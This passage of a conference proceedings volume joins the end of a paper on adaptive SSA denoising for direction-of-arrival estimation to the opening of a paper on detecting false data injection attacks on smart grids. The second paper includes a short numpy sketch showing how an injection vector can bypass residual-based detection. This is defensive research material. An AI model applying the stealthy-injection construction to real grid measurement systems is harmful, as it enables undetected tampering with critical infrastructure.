$$\tilde R = \frac{1}{K_{sub}} \sum_{k=1}^{K_{sub}} J_k R J_k^T. \quad (16)$$
The similarity between the selection matrices J_k and J_i can be seen. In matrix terms, J_k R J_k^T simply extracts the k-th L_sub × L_sub diagonal block of R, as the sketch below illustrates.
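A minimal sketch (an illustration, not the authors' code) of the forward spatial smoothing in (15)-(16); R is assumed to be an M × M sample covariance matrix:

```python
import numpy as np

def spatial_smoothing(R, L_sub):
    """Forward spatial smoothing (16) for an M x M covariance matrix R."""
    M = R.shape[0]
    K_sub = M - L_sub + 1
    R_sm = np.zeros((L_sub, L_sub), dtype=complex)
    for k in range(K_sub):
        # J_k R J_k^T selects the k-th L_sub x L_sub diagonal block of R
        R_sm += R[k:k + L_sub, k:k + L_sub]
    return R_sm / K_sub
```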
Fig. 3. Presentation of the ULA consisting of two subarrays
A graphical explanation of spatial smoothing is presented in Fig. 4. The CM presented on the right side of the figure is the result of averaging the CMs shown on the left side. It can be seen that the restriction of the spatial smoothing procedure is the reduction of the array aperture.
Fig. 4. Spatially smoothed CM calculation
The spatial smoothing (averaging) procedure is one of the CM toeplitzation approaches. It increases the rank of the averaged source CM. A similar procedure of CM averaging was used with the surrogate data technology [20]. In our case the spatial smoothing procedure should be performed after Step 5 (i.e., based on X_filt). After this step the DOA estimation step is realized. Therefore, for the case with the same frequencies the number of steps grows to 8. The obtained estimates can be used for signal reconstruction. Furthermore, recognition of the signals can be realized thanks to the noise reduction by adaptive SSA.
3 Simulation Results

In this section, the performance of the proposed approach is numerically analyzed and compared to other approaches proposed before. In order to test the effectiveness of the proposed and considered approaches, we considered a ULA with half-wavelength interelement spacing. Two equally powered signals are assumed to impinge on the ULA. In the process of simulation, the DOAs of the sources, the intersource angular distance, and the number of snapshots were changed. The SNR was defined as $10\log_{10}\big(\sum_{v=1}^{V} \varsigma_v^2/\sigma^2\big)$.
In the first case a ULA of M = 8 sensors is used, the number of snapshots is N = 64, and the DOAs of the sources are θ_1 = 10°, θ_2 = 14°. The normalised frequencies of the signals are f_1 = 0.3 and f_2 = 0.313. The angular spacing is less than the Rayleigh resolution limit. L = 1000 Monte-Carlo simulation runs were performed. The root-mean-square error (RMSE) of DOA estimation was averaged over the number of signals. The least squares (LS) ESPRIT was used for simulation. We compared the performance of LS ESPRIT, TLS ESPRIT, and LS ESPRIT with adaptive SSA and with usual (basic) SSA. RMSEs of DOA estimation versus the SNR are presented in Fig. 5; the LS abbreviation is omitted in the legend. It can be seen from Fig. 5 that the performance of the proposed approach is better as compared to the other mentioned methods.
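LS ESPRIT itself is standard; a compact sketch of it is given below (an illustration, not the code used for the reported results), assuming a half-wavelength ULA and a known number of sources V. It can be applied either to the raw N × M data matrix X or to data reconstructed after SSA filtering.

```python
import numpy as np

def ls_esprit(X, V):
    """X: N x M data matrix; returns the DOA estimates in degrees."""
    R = X.conj().T @ X / X.shape[0]             # M x M sample covariance matrix
    _, vecs = np.linalg.eigh(R)                 # eigenvalues in ascending order
    Es = vecs[:, -V:]                           # signal-subspace basis
    # Shift invariance of the two maximally overlapping subarrays (LS solution)
    Psi = np.linalg.lstsq(Es[:-1], Es[1:], rcond=None)[0]
    phases = np.angle(np.linalg.eigvals(Psi))   # = 2*pi*delta*sin(theta)/lambda
    return np.rad2deg(np.arcsin(phases / np.pi))  # delta = lambda/2
```

For the scenario generated earlier, ls_esprit(X, 2) should return estimates near 10° and 14° at sufficiently high SNR.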
Fig. 5. RMSE of DOA estimation versus the SNR, M = 8, l = 8
In the second case, the performance of the methods used in the previous case was investigated as a function of the segment size. The DOAs of the sources were θ_1 = 10°, θ_2 = 16°. Simulation results are presented in Fig. 6.
Fig. 6. RMSEs versus the size of segment, M = 8, SNR = −7 dB
The analysis of the figure shows that the performance improvement of the proposed approach as compared to basic SSA for the considered SNR value is evident for segment sizes from 5 to 39. A similar tendency takes place for smaller angular distances between the sources than the one considered for Fig. 6 (Δθ < 6°). Based on the results presented in Fig. 6, l = 20 is used in the following simulation; the other simulation parameters were the same as for Fig. 5 (Fig. 7).
Fig. 7. RMSE of DOA estimation versus the SNR, M = 8, l = 20.
Additional improvement of the proposed approach is observed for l = 30. However, the performance improvement obtained when increasing the segment (window) size is attained at the cost of a higher computational load. This can be explained by the size of the matrix X_bh, which is l × (KM), where K = N − l + 1. It is known that the computational load of the SVD is O(m_r m_c²) flops, where m_r (m_c) is the number of rows (columns) of the matrix; a small numerical check is given below. The performance relation does not change if the number of antenna elements is reduced (Fig. 8). A ULA of M = 6 elements was used, and the DOAs of the sources were θ_1 = 10°, θ_2 = 16°, l = 10.
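As an illustration, using the O(m_r m_c²) estimate above and the simulation parameters M = 8, N = 64:

```python
# Illustrative size/cost check for the SVD of the l x (K*M) matrix X_bh.
M, N = 8, 64
for l in (8, 20, 30):
    K = N - l + 1
    m_r, m_c = l, K * M                          # rows and columns of X_bh
    print(f"l={l}: X_bh is {m_r} x {m_c}, ~{m_r * m_c**2:.2e} flops")
```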
Fig. 8. RMSE of DOA estimation versus the SNR, M = 6, l = 10
However, the threshold SNR changes because of the reduction of the number of antenna elements from M = 8 to M = 6. In the following case we consider the situation with the same signal frequencies (i.e., f_1 = f_2). Because the performance of the approaches considered for comparison deteriorates in this situation, the spatial smoothing procedure is additionally realized as compared to the previous situations. Besides classical spatial smoothing, the forward-backward averaging procedure, the enhanced spatial smoothing procedure [6], and the spatial smoothing procedure with improved aperture can be used. The enhanced procedure utilizes the information from the subarrays more fully. The DOAs of the sources were selected as θ_1 = 10°, θ_2 = 14°. The parameter L_sub = 5 was used, and K_sub = M − L_sub + 1 = 4 subarrays were formed. Figure 9 displays the simulation results for this case.
Fig. 9. RMSE of DOA estimation versus the SNR, l = 20, Lsub = 5.
It can be seen that the performance of ESPRIT with SSA is also better in the considered case. On the other hand, in this case the performance of TLS ESPRIT is approximately the same as that of LS ESPRIT. In the next case the number of snapshots was N = 24. The results of the simulation are presented in Fig. 10. Figure 10 shows that under the considered conditions the character of the curves (the dependence of RMSE on SNR) does not change.
Fig. 10. RMSE of DOA estimation versus the SNR, l = 8
4 Conclusion

In this contribution the adaptive singular spectrum analysis method, which assumes additional noise reduction in the (signal + noise) subspace, is extended to antenna array signal processing. The spatial smoothing procedure is used in the case of identical signal frequencies. The performance of adaptive SSA was compared with classic SSA and the TLS method. It is shown that application of the proposed approach leads to improved DOA estimation performance for the considered signal model. Furthermore, the application of adaptive SSA is preferable as compared to the TLS method when using the ESPRIT method, despite the fact that the computational loads of both denoising approaches are comparable. The proposed method is useful as a preprocessing step for signal estimation methods based on the KLT (i.e., subspace-based methods and others). Its main steps are related to low-rank approximation and approximation by a Hankel-structured matrix. The low-rank approximation step is performed simultaneously with the singular value adaptation step, which consists in subtraction of the noise standard deviation. The enhancement of DOA estimation performance will allow improving the performance of subsequent signal reconstruction and recognition of the signals. The size of the segment (window) influences the performance and computational load of the approach. Different variants of the spatial smoothing procedure can be used, including forward-backward spatial smoothing. The quality of the noise variance estimate also influences the performance of the considered approach. Instead of the classical estimate, related to averaging of the noise subspace spectral components, the improved estimate is used. It is of interest to apply the considered approach to speech processing with a microphone array, separation of overlapping replies in secondary surveillance radar, weak signal acquisition enhancement in satellite navigation systems, spectral self-coherence restoral in communication systems with an antenna array, and spectrum sensing for cognitive radio. The wide application of low Earth orbit satellites (Starlink, Iridium,
Globalstar) motivates interest in estimation of the Doppler frequency of received (downlink) OFDM signals [9, 10, 42]. Furthermore, the generalization of the proposed approach to joint angle-frequency and joint angle-time-delay estimation, and to rectangular (circular) arrays, is evident. Joint range-azimuth-Doppler estimation is also a possible direction of application of adaptive SSA. The extension of adaptive SSA to subarray-based antenna arrays and minimum redundancy antenna arrays is of interest. In situations with colored noise, a prewhitening procedure should be performed. In the presence of a jammer, the principles of the adaptive antenna array can be applied. The application of the damped SVD instead of the truncated SVD is also of interest. This variant of the SVD is more appropriate in applications such as image processing, speech processing, and recognition. In the small sample case, when the number of snapshots is less than the number of antenna elements, so-called diagonal loading or approaches that allow increasing the number of snapshots should be used. Randomized algorithms for the low-rank approximation of matrices, the rank-revealing ULV decomposition, graph signal processing, and the ideas of circulant SSA can be used for realization of the proposed approach [43, 44]. Furthermore, additional improvement may be expected when combining the considered approach with other noise reduction methods and techniques from antenna array signal processing.
References

1. Pillai, S.U.: Array Signal Processing. Springer, New York (1989). https://doi.org/10.1007/978-1-4612-3632-0
2. Sarkar, T.K., Wicks, M.C., Salazar-Palma, M., Bonneau, R.J.: Smart Antennas. Wiley-Interscience (2003)
3. Godara, L.C.: Smart Antennas. CRC Press, Boca Raton (2004)
4. Bazan, O., Kazi, B.U., Jaseemuddin, M.: Beamforming Antennas in Wireless Networks. Multihop and Millimeter Wave Communication Networks. Springer, Heidelberg (2021). https://doi.org/10.1007/978-3-030-77459-2
5. Guo, Y.J., Ziolkowski, R.W.: Advanced Antenna Array Engineering for 6G and Beyond Wireless Communications. Wiley-IEEE Press (2021)
6. Trees, H.L.V.: Optimum Array Processing. Part IV of Detection, Estimation and Modulation Theory. Wiley-Interscience (2002)
7. Zoubir, A.M., Viberg, M., Chellappa, R., Theodoridis, S. (eds.): Academic Press Library in Signal Processing: Vol. 3 Array and Statistical Signal Processing. Elsevier (2014)
8. Benesty, J., Cohen, I., Chen, J.: Fundamentals of Signal Enhancement and Array Signal Processing. Wiley, Singapore (2017)
9. Khalife, J., Neinavaie, M., Kassas, Z.: Blind Doppler tracking from OFDM signals transmitted by broadband LEO satellites. Paper presented at the IEEE Vehicular Technology Conference, April 2021, pp. 1–6 (2021). https://doi.org/10.1109/VTC2021-Spring51267.2021.9448678
10. Chen, Q., Wang, Z., Pedersen, G.F., Shen, M.: Joint satellite-transmitter and ground-receiver digital pre-distortion for active phased arrays in LEO satellite communications. Remote Sens. 14, 4319 (2022). https://doi.org/10.3390/rs14174319
11. Wang, W.-Q.: Retrodirective frequency diverse array focusing for wireless information and power transfer. IEEE J. Sel. Areas Commun. 37(1), 61–73 (2019). https://doi.org/10.1109/JSAC.2018.2872360
12. Vasylyshyn, V.: Direction of arrival estimation using ESPRIT with sparse arrays. Paper presented at the 2009 European Radar Conference, Rome, pp. 246–249 (2009)
13. Tufts, D.W., Kumaresan, R., Kirsteins, W.: Data adaptive signal estimation by singular value decomposition of a data matrix. Proc. IEEE 70(6), 684–685 (1982)
14. Cadzow, J.A., Wilkes, D.M.: Enhanced resolution and modeling of exponential signals. Paper presented at the International Conference on Acoustics, Speech, and Signal Processing, Toronto, pp. 3033–3036 (1991)
15. Plaut, G., Vautard, R.: Spells of low-frequency oscillations and weather regimes in the Northern Hemisphere. J. Atmos. Sci. 51(2), 210–236 (1994)
16. Van Huffel, S.: Enhanced resolution based on minimum variance estimation and exponential data modeling. Signal Process. 33(3), 333–355 (1993)
17. Golyandina, N., Zhigljavsky, A.: Singular Spectrum Analysis for Time Series. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-34913-3
18. Vasylyshyn, V.: Adaptive complex singular spectrum analysis with application to modern superresolution methods. In: Radivilova, T., Ageyev, D., Kryvinska, N. (eds.) Data-Centric Business and Applications. LNDECT, vol. 48, pp. 35–54. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-43070-2_3
19. Vasylyshyn, V.: Estimation of signal parameters using SSA and linear transformation of covariance matrix or data matrix. In: Ageyev, D., Radivilova, T., Kryvinska, N. (eds.) Data-Centric Business and Applications. LNDECT, vol. 69, pp. 355–373. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-71892-3_15
20. Kostenko, P., Vasylyshyn, V.I.: Surrogate data generation technology using the SSA method for enhancing the effectiveness of signal spectral analysis. Radioelectron. Commun. Syst. 58, 356–361 (2015). https://doi.org/10.3103/S0735272715080038
21. Mendel, J.M.: Tutorial on higher-order statistics (spectra) in signal processing and system theory: theoretical results and some applications. Proc. IEEE 79(3), 278–305 (1991)
22. Haardt, M., Roemer, F., del Galdo, G.: Higher-order SVD-based subspace estimation to improve the parameter estimation accuracy in multidimensional harmonic retrieval problems. IEEE Trans. Signal Process. 56(7), 3198–3213 (2008)
23. Chen, H., Ahmad, F., Vorobyov, S., Porikli, F.: Tensor decompositions in wireless communications and MIMO radar. IEEE J. Sel. Top. Signal Process. 15(3), 438–453 (2021)
24. Lathauwer, L.D., de Moor, B., Vandewalle, J.: A multilinear singular value decomposition. SIAM J. Matrix Anal. Appl. 21(4), 1253–1278 (2000)
25. Johnson, B.A., Abramovich, Y.I.: DOA estimator performance assessment in the preasymptotic domain using the likelihood principle. Signal Process. 90, 1392–1401 (2010)
26. Zhang, Y., Amin, M.G.: Spatial averaging of time–frequency distributions for signal recovery in uniform linear arrays. IEEE Trans. SP 48(10), 2892–2902 (2000)
27. Lekhovitskiy, D., Riabukha, V., Atamanskiy, D., Semeniaka, A., Rachkov, D.: Lattice filtration theory. Part I: one-dimensional lattice filters. Telecommun. Radio Eng. 80(5), 41–79 (2021)
28. Unser, M.: Splines: a perfect fit for signal and image processing. IEEE Signal Process. Mag. 16(6), 22–38 (1999)
29. Hansen, P.C., Jensen, S.H.: Subspace-based noise reduction for speech signals via diagonal and triangular matrix decompositions: survey and analysis. EURASIP J. Adv. Signal Process. 2007(1), 1–24 (2007). https://doi.org/10.1155/2007/92953
30. Vasylyshyn, V., Koval, O., Vasylyshyn, K.: Speech enhancement using modified SSA. Paper presented at the 2021 IEEE International Conference on Information and Telecommunication Technologies and Radio Electronics (UkrMiCo), 29 November–03 December 2021, Odessa, Ukraine (2021). https://doi.org/10.1109/UkrMiCo52950.2021.9716635
31. Vasylyshyn, V.: Channel estimation method for OFDM communication system using adaptive singular spectrum analysis. Paper presented at the 2020 IEEE 40th International Conference on Electronics and Nanotechnology (ELNANO), Kyiv, Ukraine (2020). https://doi.org/10.1109/ELNANO50318.2020.9088787
32. Hua, Y.: Estimating two-dimensional frequencies by matrix enhancement and matrix pencil. IEEE Trans. SP 40(9), 2267–2280 (1992)
33. Krim, H., Proakis, J.G.: Smoothed eigenspace-based parameter estimation. Autom. Special Issue Stat. Signal Process. Control 30(1), 27–38 (1994)
34. Gunsay, M., Jes, B.D.: Point source localization in blurred images by a frequency-domain eigenvector-based method. IEEE Trans. Image Process. 4(12), 1602–1612 (1995)
35. Sarkar, T.K., Pereira, O.: Using the matrix pencil method to estimate the parameters of a sum of complex exponentials. IEEE Antennas Propag. Mag. 37(1), 48–55 (1995)
36. Shan, T.J., Wax, M., Kailath, T.: On spatial smoothing for DOA estimation of coherent sources. IEEE Trans. Acoust. Speech Signal Process. 33(4), 806–811 (1985)
37. Vasylyshyn, V.: Direction of arrival estimation with ULA using SSA-based preprocessing. Paper presented at the 2020 IEEE International Conference on Problems of Infocommunications, Science and Technology (PIC S&T), Kharkiv, Ukraine, 06–09 October 2020, pp. 497–500 (2020). https://doi.org/10.1109/PICST51311.2020.9468095
38. Van Der Veen, A.J., Vanderveen, M.C., Paulraj, A.J.: Joint angle and delay estimation using shift-invariance properties. IEEE Signal Process. Lett. 4(5), 142–145 (1997). https://doi.org/10.1109/97.575559
39. Lemma, A.N., van der Veen, A.-J., Deprettere, E.F.: Analysis of joint angle-frequency estimation using ESPRIT. IEEE Trans. SP 51(5), 1264–1283 (2003)
40. Gershman, A.B., Ermolaev, V.T.: Optimal subarray size for spatial smoothing. IEEE Signal Process. Lett. 2(2), 28–30 (1995)
41. Reddy, S.R., Gershman, A.B.: An alternative approach to coherent source location problem. Signal Process. 59, 221–233 (1997)
42. Gurcan, Y., Yarovoy, A.: Super-resolution algorithm for joint range-azimuth-Doppler estimation in automotive radars. Paper presented at the 2017 European Radar Conference (EURAD), pp. 73–76 (2017)
43. Liberty, E., Woolfe, F., Martinsson, P.G., Rokhlin, V., Tygert, M.: Randomized algorithms for the low-rank approximation of matrices. PNAS 104(51), 20167–20172 (2007)
44. Bógalo, J., Poncela, P., Senra, E.: Circulant singular spectrum analysis: a new automated procedure for signal extraction. Signal Process. 179, 107824 (2021). https://doi.org/10.1016/j.sigpro.2020.107824
Method for Detecting FDI Attacks on Intelligent Power Networks

Vitalii Martovytskyi, Igor Ruban, Andriy Kovalenko(B), and Oleksandr Sievierinov
Kharkiv National University of Radioelectronics, 14, Nauki Avenue, Kharkiv 61000, Ukraine {vitalii.martovitskyi,andriy.kovalenko}@nure.ua
Abstract. Nowadays, energy systems in many countries improve and develop based on the concept of deep integration of energy grids and infocommunication networks. Thus, energy grids gain the ability to analyze the state of the whole system in real time, to predict the processes in it, to interact with clients, and to control the equipment. Such a concept has been named Smart Grid. This work highlights the concept of Smart Grid, possible attack vectors, and the identification of false data injection (FDI) attacks on the flow of measurements received from sensors. Identification is based on the use of spatial and temporal correlations in Smart Grids.

Keywords: Smart Grid · FDI attacks · energy systems · intelligent grid · false data injection · electric energy systems · cyber-attacks
1 Introduction

The existing power systems use a centralized power supply scheme, which implies the use of high voltage and the creation of large-scale energy grids. Local faults in such grids can have a tremendous impact on the entire energy system and often cause large-scale power outages. Moreover, large electricity producers generate and supply electricity in volumes, in modes, and at costs that are essentially independent of the actual state of electricity consumers in real time. In terms of reliability, under conditions of power shortage and high consumer demand this scheme is extremely vulnerable, since it cannot quickly identify problems and respond to them at the consumer level. Nowadays, electric energy systems in many countries improve and develop based on the concept of deep integration of electric energy grids and infocommunication networks. Thus, energy grids gain the possibility to analyze the whole system in real time, predict processes in it, interact with customers, and control the equipment. This concept has been named Smart Grid (or intelligent grid). This paper examines the concept of Smart Grid, possible attack vectors, and the detection of false data injection (FDI) attacks on sensor measurement data. Identification is based on the use of spatial and temporal correlations in Smart Grids. The purpose of the study is to identify FDI attacks on Smart Grids.
2 Relevance of Using Smart Grid and Problem Setting

2.1 Relevance of Using Smart Grid

According to article [1], the results of studies on the implementation of smart grids carried out in some US states showed a decrease in peak loads on the energy grid; on average, energy bills decreased by 10% (while the cost of energy increased by 15%). Some estimates indicate that the use of a smart grid system by 2020 would allow the US to save about $1.8 trillion by reducing energy consumption and increasing reliability. Electricity market experts predict that electricity demand will double by 2030, but the governments of the European Union member states planned to reduce electricity consumption by 9% by 2017 through improved energy efficiency (this can be achieved through the widespread adoption of smart grid technology). In Europe, $750 billion in funding is provided for programs to expand smart grids over 30 years. Furthermore, according to study [2], the Smart Grid market is expected to reach $229.24 billion by 2026, up from $17.5 billion in 2016. Currently, smart grid technology is developing and spreading most actively and on the largest scale in Denmark. This is largely due to the fact that this country receives a significant amount of energy from alternative sources (20% of its total energy is wind energy). Typically, the structure of Smart Grid is very dynamic and rapidly changing, and the advanced economies are the key players in Smart Grid investments [3, 4]. In terms of funding allocation, we analyze only America and Europe. Funding in America is mainly provided by the SGIG (Smart Grid Investment Grant). Figure 1(a) shows SGIG facilities by recipient type. It is obvious that the largest share is accounted for by investor-owned utilities, followed by public power utilities [5]. Figure 1(b) shows the distribution of European funding across leading organizations. As compared to the USA, DSOs/utilities/energy companies spent the largest share of funds, reaching 55%, followed by universities/research centers/consulting companies [5].
Fig. 1. Investment allocation in America and Europe: a) SGIG funds by type of recipient, b) Distribution of EC funding across leading organizations [5]
2.2 Smart Grid Security Challenges

The experience of using Smart Grids has shown their vulnerability to various types of cyberattacks. As can be seen from the annual vulnerability coordination report Incident-Response-Analyst_2020 [6] (Fig. 2), industrial automation is one of the most vulnerable areas.
Fig. 2. Vulnerability coordination report
The key areas of Smart Grid are the control of generation, transmission, distribution, and consumption of electricity. Effective and safe communication must be ensured in all areas. Privacy, confidentiality, and data authentication are of crucial importance for reliability in such systems. The system should also effectively prevent unauthorized modifications to the entire infrastructure, and it is therefore necessary to develop distributed cybersecurity systems for ensuring data integrity and architecture monitoring. Intelligent grid systems have different vulnerabilities, each with various features. Numerous cyber threats can target different smart grid applications and cause harm ranging from low to high levels. Correct identification of the type of threats and security vulnerabilities makes it possible to determine the appropriate countermeasures. These attacks may have many serious consequences for smart grids, such as leaked customer information, disrupted infrastructure, or large-scale power outages [7]. The accuracy of the data circulating in the system is crucial to the reliable and efficient operation of a smart grid. Frequency, current, voltage, or GPS time stamps may be changed. Spoofing attacks, such as identity or data replacement, can result in loss of integrity and availability. Moreover, they seriously degrade the reliability, stability, and security of the smart grid. Spoofing attacks include MITM attacks, message replays, and software attacks. The use of multiple devices to monitor the data link, collaboration between GPS services, the use of a single data stream, and the synchronization of measurements with the Network Time Protocol (NTP) at different locations in real time are important countermeasures against spoofing attacks [7]. Among the various types of cyberattacks, false data injection (FDI) attacks are undoubtedly the most common and dangerous. Attackers may easily modify system
measurement data and manipulate input commands to degrade system performance or even cause irreparable harm. It should be noted that the damage to such systems can be kept within an acceptable limit if malicious attacks are detected in time.

2.3 Problem Setting

The paper examines an FDI attack on energy consumption data. An FDI (false data injection) attack targets the smart grid infrastructure by injecting false measurements into the periodic measurement reports sent to the control center. An essential prerequisite for a successful FDI attack is to pass the state estimator's validation and avoid raising alerts. The attacker generates the false measurement injection in such a way that the residual value remains less than the specified threshold. Accordingly, an FDI attack can mislead the control center into making wrong decisions that negatively impact the grid performance. This attack can be aimed at raw measurements or at state estimates. In the case of an FDI attack, additive malicious data are injected into the measurements of a subset of the meters. In practice, an FDI attack can be performed by manipulating network communication channels or by hacking meters and/or control centers in the smart grid. According to article [8], the measurement model in the case of an FDI attack is as follows:

$$y_t = Hx_t + a_t + w_t, \quad t \ge \tau, \quad (1)$$

where a_t = [a_{1,t}^T, a_{2,t}^T, ..., a_{k,t}^T]^T denotes the injected false data at time t, H is the measurement matrix, and w_t = [w_{1,t}^T, w_{2,t}^T, ..., w_{k,t}^T]^T is the measurement noise vector. In practice, the attacker usually has no information about the grid structure or previous measurements in the smart meter. He can develop his attacks only on the basis of assumptions about the standard power consumption [9]. The simplest application of this attack is to lower the cost of energy bills. In this case, the violators are the electricity consumers themselves. The reverse is also possible: competitors can compromise the state assessment in order to increase the expenses of the attacked company. In this case, the process of energy distribution is disrupted, which can lead not only to financial losses, but also to damage to equipment.
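As a rough illustration of model (1) (not tied to any specific grid; the matrix H, the state dimension, the attack vector, and the noise level are all illustrative assumptions), false data can be injected from time τ onward as follows:

```python
import numpy as np

rng = np.random.default_rng(0)
m_meas, n_state, T, tau = 6, 3, 10, 5
H = rng.standard_normal((m_meas, n_state))        # measurement matrix (assumed)
a = np.zeros(m_meas)
a[2] = 4.0                                        # false data injected into one meter

measurements = []
for t in range(T):
    x_t = rng.standard_normal(n_state)            # true system state
    w_t = 0.1 * rng.standard_normal(m_meas)       # measurement noise
    y_t = H @ x_t + w_t + (a if t >= tau else 0)  # model (1)
    measurements.append(y_t)
```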
3 FDI Attack Detection Method

3.1 Method of FDI Attack Detection Using Spatial and Temporal Correlations

As the basis for this paper, the FDI detection method using spatial and temporal correlations in smart grids is chosen. Spatio-temporal correlation is an inherent feature of various physical phenomena, since they are usually continuous in both the temporal and spatial domains. Given that the cyber state is a reflection of these phenomena, the estimates of these states in a correlated area should also be spatially correlated. In general, the following correlations exist in smart grids:

1. Correlation between generated energy and consumer needs. Typically, in order to reduce the extra overhead caused by energy storage, traditional energy suppliers (such
as fossil-fueled power plants) tend to dynamically adapt their electricity generation to customer needs. Therefore, energy suppliers in the same area can be spatially correlated in time, as they should reflect the current state of energy consumption in the vicinity.

2. Correlation between data from closely spaced renewable energy sources. Since renewable energy sources draw on natural resources (such as solar and wind power), power generators located in a neighboring area should simultaneously perceive the current state of the environment. That is, they are spatially correlated. Moreover, these spatial correlations should be similar to those that have occurred in the past, which means these energy sources are also temporally correlated, as natural resources are continuous and should therefore lead to interrelated effects for these energy suppliers.

3. Correlation between energy consumption data of closely located consumers. In general, energy consumption in a certain area should simultaneously reflect the current state of that region. For example, in winter, energy consumers in neighboring cities tend to consume more energy than in summer due to the use of heaters, even though each individual has distinct energy consumption patterns. Thus, the overall behaviour of the nodes can be consistent and correlated with other consumer nodes at higher abstractions (e.g. in city districts).

Difficulties in conducting an FDI attack:

1. Attackers have to know the current configuration of the target power system, in particular the system topology. This system configuration changes frequently due to the planned daily maintenance of energy grid equipment and unplanned events such as unexpected equipment outages. Typically, this information is only available at energy company control centers.

2. Attackers must physically tamper with meters or manipulate meter measurements before they can be used for state assessment in the control center. Many of these meters are located in places that are protected from unauthorized physical access (for example, substations).

The main advantage of researching FDI attacks is the identification of vulnerabilities in existing state assessment methods. The exact impact of such attacks depends not only on the errors injected, but also on how the measurement data (and therefore the measurement errors) will be used in the end applications. Currently, the personnel of the control center are typically involved in the decision-making process, and experienced operators can identify anomalies caused by such attacks.

3.2 Approaches to FDI Detection

The traditional method of FDI attack detection is to assess the relationship between meter measurements and system states. This approach is described in detail in article [9]. In this method, the relationships between raw meter measurements and system states are described as

z = Hx + e
(2)
where the matrix H describes the system configuration, and the vectors z, x, and e are the output measurements (voltage, electric current), the state estimates (energy demand and supply), and the meter measurement errors, respectively. Therefore, for a predicted state x̂, abnormal values can be detected by computing the 2-norm of the measurement residual, ‖z − Hx̂‖₂. The measurement is considered abnormal if ‖z − Hx̂‖₂ is larger than a given threshold τ. This study assumes that an attacker has access to system configuration information, including the network topology. It is also assumed that the attacker has the ability to manipulate the meter measurements by compromising either a meter or the communication between a meter and the control center. However, the attacker's ability is limited as follows:

Scenario I: The attacker has limited access to certain meters. This covers the possibility that some meters may be protected or inaccessible to the attacker for other reasons.

Scenario II: The attacker has limited resources to compromise the meters. That is, the attacker can compromise any meter, but is confined to compromising a finite number k of all meters.

An obvious approach is to protect all sensor measurements from manipulation. However, this is not always possible. If an attacker can compromise k meter measurements, where k ≥ m − n + 1, m is the number of measurements, and n is the number of state variables, then, according to [9], there always exist attack vectors that can inject false data without being detected, even if the attacker has no ability to choose which of the k meters will be compromised. This provides a minimum value for the number of meters that need to be protected. That is, a necessary condition for detecting false data is the protection of at least n meters. However, this is not a sufficient condition. Protecting no more than 50% of the sensors is still more economical and realizable. However, research [10] shows that this traditional approach can be easily circumvented if attackers can collect enough data and inject a specially crafted value that satisfies relationship (2); a sketch of this weakness is given below. Moreover, this approach can only detect group-level anomalies (each involving multiple meters). Anomalies in each individual meter cannot be detected in this way [11]. Based on the behavioral approach, intrusion detection systems (IDS) are developed, as well as methods that process data similarly to sensor networks, that is, receiving information about an event from several sources. IDSs deal with detecting intrusions in network data. Intrusions usually appear as anomalous patterns (point anomalies), although some methods model the data sequentially and detect anomalous subsequences (collective anomalies). The main source of these anomalies is attacks conducted by external hackers who want to gain unauthorized access to the network to steal information or disrupt it. In our case, this is a smart grid and false data injection. A challenge faced by anomaly detection techniques in this area is that the nature of anomalies constantly changes over time, as attackers adapt their network attacks to evade existing intrusion detection solutions. Yao Liu et al. [11] proposed their own approach for detecting false data injection targeting intelligent grids. This method is based on a combination of the detection methods of traditional IDSs and physical models.
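The following sketch (illustrative values only, with a fixed random seed) shows the residual test on model (2) and the known weakness exploited by FDI attacks [9]: any attack vector of the form a = Hc shifts the state estimate by c but leaves the residual, and hence the detector, unchanged.

```python
import numpy as np

rng = np.random.default_rng(1)
m, n, tau = 8, 3, 1.0                       # meters, states, threshold (assumed)
H = rng.standard_normal((m, n))
x = rng.standard_normal(n)
z = H @ x + 0.05 * rng.standard_normal(m)   # honest measurements per (2)

def residual(z, H):
    x_hat = np.linalg.lstsq(H, z, rcond=None)[0]   # LS state estimate
    return np.linalg.norm(z - H @ x_hat)           # ||z - H x_hat||_2

print(residual(z, H) > tau)                        # False: normal data pass
a_naive = np.eye(m)[0] * 10.0                      # crude injection into meter 1
print(residual(z + a_naive, H) > tau)              # True (with high probability)
a_stealth = H @ np.array([2.0, 0.0, 0.0])          # a = H c: stealthy injection
print(np.isclose(residual(z, H), residual(z + a_stealth, H)))  # True: undetected
```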
However, designing IDSs for smart grids is challenging due to the huge size of the grids and the heterogeneity of their components [12, 13]. Moreover, an IDS developed for traditional IT systems would not necessarily be appropriate for an intelligent grid. IDSs should be specially designed for smart grids to reduce the probability of false positive detections [13]. In general, anomaly detection using IDS is a promising direction, but to be effective, the specific algorithms within the IDS should be considered. Models based on classification are also often used to identify anomalies; the most common are Bayesian networks and rule-based detection methods. Classification is used to learn a model (classifier) from a set of labeled data (training), and then to assign a test instance to one of the classes using the learned model (testing) [8, 14–16]. Classification-based anomaly detection methods operate in a similar two-phase manner. In the training phase, the classifier is learned using the available training data. In the test phase, a test instance is identified as normal or abnormal using the classifier. Based on the labels available for the training phase, classification-based anomaly detection methods can be grouped into two broad categories: multi-class and single-class anomaly detection methods. Multi-class anomaly detection methods assume that the training data contain labeled examples belonging to several normal classes. When the environment is heterogeneous and dynamic, machine-learning-based solutions are mostly applied. Statistical models and artificial intelligence (e.g., neural networks) are typical approaches used to distinguish anomalies from the norm. An anomaly detection method based on neural networks includes two stages. First, a neural network is trained to learn the classes of normal behavior on the training data set. Second, each instance is fed as an input to the neural network. A neural-network-based system can learn one or several classes of normal behavior. Replicative neural networks have been used to find anomalies by recognizing only one class. The widespread technology of deep learning neural networks is also successfully used to solve this problem. Nevertheless, these solutions are typically complex, which limits their scalability when applied to large complex networks such as smart grids. Therefore, to achieve a more balanced solution, additional assumptions are usually made to reduce the computational complexity. Spatio-temporal correlation is one of them.

3.3 Method Description

To minimize the damage caused by FDI in smart grids, a real-time mechanism for detecting FDI attacks is used to assess the state based on the spatio-temporal correlations of the cyber state. Strongly spatio-temporally correlated intelligent components are called "neighbors". Potential anomalies can be detected by monitoring the temporal sequence of spatial correlations between state estimates. This detection mechanism can be divided into the following three phases.

Phase 1. Recognition of the spatial pattern and estimation of temporal sequences. This phase models the current state of the smart grid based on data typical of its
